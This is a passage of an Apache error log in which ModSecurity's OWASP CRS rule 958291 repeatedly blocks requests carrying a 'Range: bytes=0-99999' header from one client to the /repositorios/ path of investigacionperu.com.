"bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQLUcx1xj5z0EGUpRfwAAAEc"] [Mon Feb 17 10:35:28.238703 2025] [:error] [pid 10664:tid 140634182600448] [client 190.102.150.245:36020] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQAJrayd7JfpBdXs7lgAAAIw"] [Mon Feb 17 10:35:28.333844 2025] [:error] [pid 10664:tid 140634190993152] [client 190.102.150.245:36022] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQAJrayd7JfpBdXs7lwAAAIs"] [Mon Feb 17 10:35:28.429824 2025] [:error] [pid 10662:tid 140634174207744] [client 190.102.150.245:36024] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQP_97XY8xax64gWTiwAAAA0"] [Mon Feb 17 10:35:28.526466 2025] [:error] [pid 10662:tid 140634081888000] [client 190.102.150.245:36026] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQP_97XY8xax64gWTjAAAABg"] [Mon Feb 17 10:35:28.624277 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36028] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQKvoDupyaoF2tAucOgAAAMU"] [Mon Feb 17 10:35:28.721050 2025] [:error] [pid 11230:tid 140634199385856] [client 190.102.150.245:36030] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQKvoDupyaoF2tAucOwAAAMo"] [Mon Feb 17 10:35:28.817296 2025] [:error] [pid 10664:tid 140634232956672] [client 190.102.150.245:36032] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQAJrayd7JfpBdXs7mAAAAIY"] [Mon Feb 17 10:35:28.914003 2025] [:error] [pid 10664:tid 140634107066112] [client 190.102.150.245:36034] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQAJrayd7JfpBdXs7mQAAAJU"] [Mon Feb 17 10:35:29.010928 2025] [:error] [pid 10664:tid 140634149029632] [client 190.102.150.245:36036] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7mgAAAJA"] [Mon Feb 17 10:35:29.107442 2025] [:error] [pid 10664:tid 140634115458816] [client 190.102.150.245:36038] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7mwAAAJQ"] [Mon Feb 17 10:35:29.204138 2025] [:error] [pid 10664:tid 140634249742080] [client 190.102.150.245:36040] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7nAAAAIQ"] [Mon Feb 17 10:35:29.300466 2025] [:error] [pid 10664:tid 140634241349376] [client 190.102.150.245:36042] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7nQAAAIU"] [Mon Feb 17 10:35:29.396932 2025] [:error] [pid 10664:tid 140634258134784] [client 190.102.150.245:36044] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7ngAAAIM"] [Mon Feb 17 10:35:29.493103 2025] [:error] [pid 10664:tid 140634098673408] [client 190.102.150.245:36046] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7nwAAAJY"] [Mon Feb 17 10:35:29.589145 2025] [:error] [pid 10664:tid 140634132244224] [client 190.102.150.245:36048] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQQJrayd7JfpBdXs7oAAAAJI"] [Mon Feb 17 10:35:29.684805 2025] [:error] [pid 11230:tid 140634182600448] [client 190.102.150.245:36050] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQavoDupyaoF2tAucPAAAAMw"] [Mon Feb 17 10:35:29.782748 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36052] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQavoDupyaoF2tAucPQAAANU"] [Mon Feb 17 10:35:29.878937 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36054] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQavoDupyaoF2tAucPgAAAMs"] [Mon Feb 17 10:35:29.974997 2025] [:error] [pid 11230:tid 140634249742080] [client 190.102.150.245:36056] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQavoDupyaoF2tAucPwAAAMQ"] [Mon Feb 17 10:35:30.072213 2025] [:error] [pid 11230:tid 140634123851520] [client 190.102.150.245:36058] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucQAAAANM"] [Mon Feb 17 10:35:30.168172 2025] [:error] [pid 11230:tid 140634258134784] [client 190.102.150.245:36060] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucQQAAAMM"] [Mon Feb 17 10:35:30.264378 2025] [:error] [pid 11230:tid 140634115458816] [client 190.102.150.245:36062] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucQgAAANQ"] [Mon Feb 17 10:35:30.361592 2025] [:error] [pid 11230:tid 140634132244224] [client 190.102.150.245:36064] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucQwAAANI"] [Mon Feb 17 10:35:30.457668 2025] [:error] [pid 11230:tid 140634274920192] [client 190.102.150.245:36066] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucRAAAAME"] [Mon Feb 17 10:35:30.554171 2025] [:error] [pid 11230:tid 140634098673408] [client 190.102.150.245:36068] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucRQAAANY"] [Mon Feb 17 10:35:30.650394 2025] [:error] [pid 11230:tid 140634224563968] [client 190.102.150.245:36070] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucRgAAAMc"] [Mon Feb 17 10:35:30.746380 2025] [:error] [pid 11230:tid 140634090280704] [client 190.102.150.245:36072] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucRwAAANc"] [Mon Feb 17 10:35:30.842407 2025] [:error] [pid 11230:tid 140634241349376] [client 190.102.150.245:36074] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucSAAAAMU"] [Mon Feb 17 10:35:30.939210 2025] [:error] [pid 11230:tid 140634266527488] [client 190.102.150.245:36076] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQqvoDupyaoF2tAucSQAAAMI"] [Mon Feb 17 10:35:31.036448 2025] [:error] [pid 11230:tid 140634174207744] [client 190.102.150.245:36078] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucSgAAAM0"] [Mon Feb 17 10:35:31.133214 2025] [:error] [pid 11230:tid 140634207778560] [client 190.102.150.245:36080] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucSwAAAMk"] [Mon Feb 17 10:35:31.232264 2025] [:error] [pid 11230:tid 140634107066112] [client 190.102.150.245:36082] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucTAAAANU"] [Mon Feb 17 10:35:31.328418 2025] [:error] [pid 10663:tid 140634190993152] [client 190.102.150.245:36084] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ7Ucx1xj5z0EGUpRgAAAAEs"] [Mon Feb 17 10:35:31.425667 2025] [:error] [pid 10664:tid 140634354153216] [client 190.102.150.245:36086] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQwJrayd7JfpBdXs7oQAAAIA"] [Mon Feb 17 10:35:31.521537 2025] [:error] [pid 10663:tid 140634174207744] [client 190.102.150.245:36088] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ7Ucx1xj5z0EGUpRgQAAAE0"] [Mon Feb 17 10:35:31.618327 2025] [:error] [pid 11230:tid 140634165815040] [client 190.102.150.245:36090] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucTQAAAM4"] [Mon Feb 17 10:35:31.714848 2025] [:error] [pid 11230:tid 140634190993152] [client 190.102.150.245:36092] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucTgAAAMs"] [Mon Feb 17 10:35:31.813693 2025] [:error] [pid 11230:tid 140634081888000] [client 190.102.150.245:36094] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ6voDupyaoF2tAucTwAAANg"] [Mon Feb 17 10:35:31.910252 2025] [:error] [pid 10662:tid 140634190993152] [client 190.102.150.245:36096] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXQ__97XY8xax64gWTjQAAAAs"] [Mon Feb 17 10:35:32.006531 2025] [:error] [pid 11230:tid 140634232956672] [client 190.102.150.245:36098] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "investigacionperu.com"] [uri "/repositorios/"] [unique_id "Z7NXRKvoDupyaoF2tAucUAAAAMY"] [Mon Feb 17 10:35:32.103097 2025] [:error] [pid 11230:tid 140634149029632] [client 190.102.150.245:36100] [client 190.102.150.245] ModSecurity: Access denied with code 403 (phase 2). String match "bytes=0-" at REQUEST_HEADERS:Range. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "428"] [id "958291"] [rev "2"] [msg "Range: field exists and begins with 0."] [data "bytes=0-99999"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag 